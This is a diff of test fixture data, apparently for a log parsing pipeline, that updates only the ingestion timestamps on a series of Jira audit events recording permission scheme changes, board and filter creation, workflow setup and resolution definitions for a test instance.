@@ -2817,7 +2811,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590319467Z", + "ingested": "2021-12-15T09:00:40.254647469Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.184Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Administer Projects\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2891,7 +2885,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590322068Z", + "ingested": "2021-12-15T09:00:40.254648648Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.182Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Link Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -2960,7 +2954,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590324602Z", + "ingested": "2021-12-15T09:00:40.254649896Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.180Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Work On Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3029,7 +3023,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590327144Z", + "ingested": "2021-12-15T09:00:40.254651176Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.178Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Attachments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3098,7 +3092,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590333834Z", + "ingested": "2021-12-15T09:00:40.254652362Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.176Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Close Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3167,7 +3161,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590336662Z", + "ingested": "2021-12-15T09:00:40.254653587Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.174Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Assignable User\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3236,7 +3230,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590339200Z", + "ingested": "2021-12-15T09:00:40.254654869Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.173Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Delete Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3310,7 +3304,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590341794Z", + "ingested": "2021-12-15T09:00:40.254656062Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.171Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Add Comments\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3379,7 +3373,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590344375Z", + "ingested": "2021-12-15T09:00:40.254657250Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.168Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Resolve Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3448,7 +3442,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590346994Z", + "ingested": "2021-12-15T09:00:40.254658423Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.166Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Assign Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3517,7 +3511,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590349592Z", + "ingested": "2021-12-15T09:00:40.254659629Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.165Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3586,7 +3580,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590352274Z", + "ingested": "2021-12-15T09:00:40.254661016Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.163Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3655,7 +3649,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590354853Z", + "ingested": "2021-12-15T09:00:40.254662186Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.151Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Browse Projects\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3724,7 +3718,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.created", - "ingested": "2021-12-08T14:50:33.590357430Z", + "ingested": "2021-12-15T09:00:40.254663455Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.142Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.created\",\"action\":\"Permission scheme created\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Default scheme for Software projects.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Default software scheme\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3793,7 +3787,7 @@ }, "event": { "action": "Board created", - "ingested": "2021-12-08T14:50:33.590359989Z", + "ingested": "2021-12-15T09:00:40.254664784Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.072Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.boards\",\"category\":\"boards\",\"actionI18nKey\":\"Board created\",\"action\":\"Board created\"},\"affectedObjects\":[{\"name\":\"TEST board\",\"type\":\"BOARD\",\"uri\":\"http://jira.internal:8088/secure/RapidView.jspa?rapidView=1\",\"id\":\"1\"},{\"name\":\"TEST board\",\"type\":\"BOARD\",\"uri\":\"http://jira.internal:8088/secure/RapidView.jspa?rapidView=1\",\"id\":\"1\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3856,7 +3850,7 @@ }, "event": { "action": "jira.auditing.filter.created", - "ingested": "2021-12-08T14:50:33.590362644Z", + "ingested": "2021-12-15T09:00:40.254665971Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.887Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.filters\",\"category\":\"filters\",\"actionI18nKey\":\"jira.auditing.filter.created\",\"action\":\"Filter created\"},\"affectedObjects\":[{\"name\":\"Filter for TEST board\",\"type\":\"FILTER\",\"uri\":\"http://jira.internal:8088/issues/?filter=10000\",\"id\":\"10000\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.concepts.description\",\"from\":\"\"},{\"key\":\"JQL Query\",\"i18nKey\":\"jira.jql.query\",\"from\":\"\",\"to\":\"{project = \\\"TEST\\\"} order by Rank ASC\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"from\":\"\",\"to\":\"Filter for TEST board\"},{\"key\":\"Owner\",\"i18nKey\":\"common.concepts.owner\",\"from\":\"\",\"to\":\"test.user\"},{\"key\":\"Shared with\",\"i18nKey\":\"common.concepts.shared.with\",\"from\":\"[]\",\"to\":\"[Project: test (VIEW)]\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -3952,7 +3946,7 @@ }, "event": { "action": "jira.auditing.workflow.scheme.added.to.project", - "ingested": "2021-12-08T14:50:33.590365213Z", + "ingested": "2021-12-15T09:00:40.254667234Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.746Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.added.to.project\",\"action\":\"Workflow scheme added to project\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10100\",\"id\":\"10100\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -4015,7 +4009,7 @@ }, "event": { "action": "jira.auditing.workflow.scheme.created", - "ingested": "2021-12-08T14:50:33.590367757Z", + "ingested": "2021-12-15T09:00:40.254668441Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.732Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.created\",\"action\":\"Workflow scheme created\"},\"affectedObjects\":[{\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10100\",\"id\":\"10100\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow scheme is managed internally by Jira Software. Do not manually modify this workflow scheme.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"TEST: Software Simplified Workflow Scheme\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -4084,7 +4078,7 @@ }, "event": { "action": "jira.auditing.workflow.created", - "ingested": "2021-12-08T14:50:33.590370355Z", + "ingested": "2021-12-15T09:00:40.254669701Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.710Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.workflow.created\",\"action\":\"Workflow created\"},\"affectedObjects\":[{\"name\":\"Software Simplified Workflow for Project TEST\",\"type\":\"WORKFLOW\",\"uri\":\"http://jira.internal:8088/secure/admin/workflows/ViewWorkflowSteps.jspa?workflowMode=live\u0026workflowName=Software Simplified Workflow for Project TEST\",\"id\":\"Software Simplified Workflow for Project TEST\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow is managed internally by Jira Software. Do not manually modify this workflow.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Software Simplified Workflow for Project TEST\"},{\"key\":\"Status\",\"i18nKey\":\"common.words.status\",\"to\":\"To Do, In Progress, Done\"},{\"key\":\"Transition\",\"i18nKey\":\"admin.workflowtransition.transition\",\"to\":\"Create (To Do), To Do (To Do), In Progress (In Progress), Done (Done)\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -4163,7 +4157,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:33.590372882Z", + "ingested": "2021-12-15T09:00:40.254670888Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.537Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Cannot Reproduce\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10003\",\"id\":\"10003\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"All attempts at reproducing this issue failed, or not enough information was available to reproduce the issue. Reading the code produces no clues as to why this behavior would occur. If more information appears later, please reopen the issue.\"}]}", "type": "info", "kind": "event" 
@@ -4227,7 +4221,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:33.590375444Z", + "ingested": "2021-12-15T09:00:40.254672056Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.536Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Duplicate\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10002\",\"id\":\"10002\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"The problem is a duplicate of an existing issue.\"}]}", "type": "info", "kind": "event" 
@@ -4291,7 +4285,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:33.590378057Z", + "ingested": "2021-12-15T09:00:40.254673289Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.535Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Won't Do\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10001\",\"id\":\"10001\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"This issue won't be actioned.\"}]}", "type": "info", "kind": "event" 
@@ -4355,7 +4349,7 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-08T14:50:33.590380754Z", + "ingested": "2021-12-15T09:00:40.254674500Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.534Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Done\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10000\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"Work has been completed on this issue.\"}]}", "type": "info", "kind": "event" 
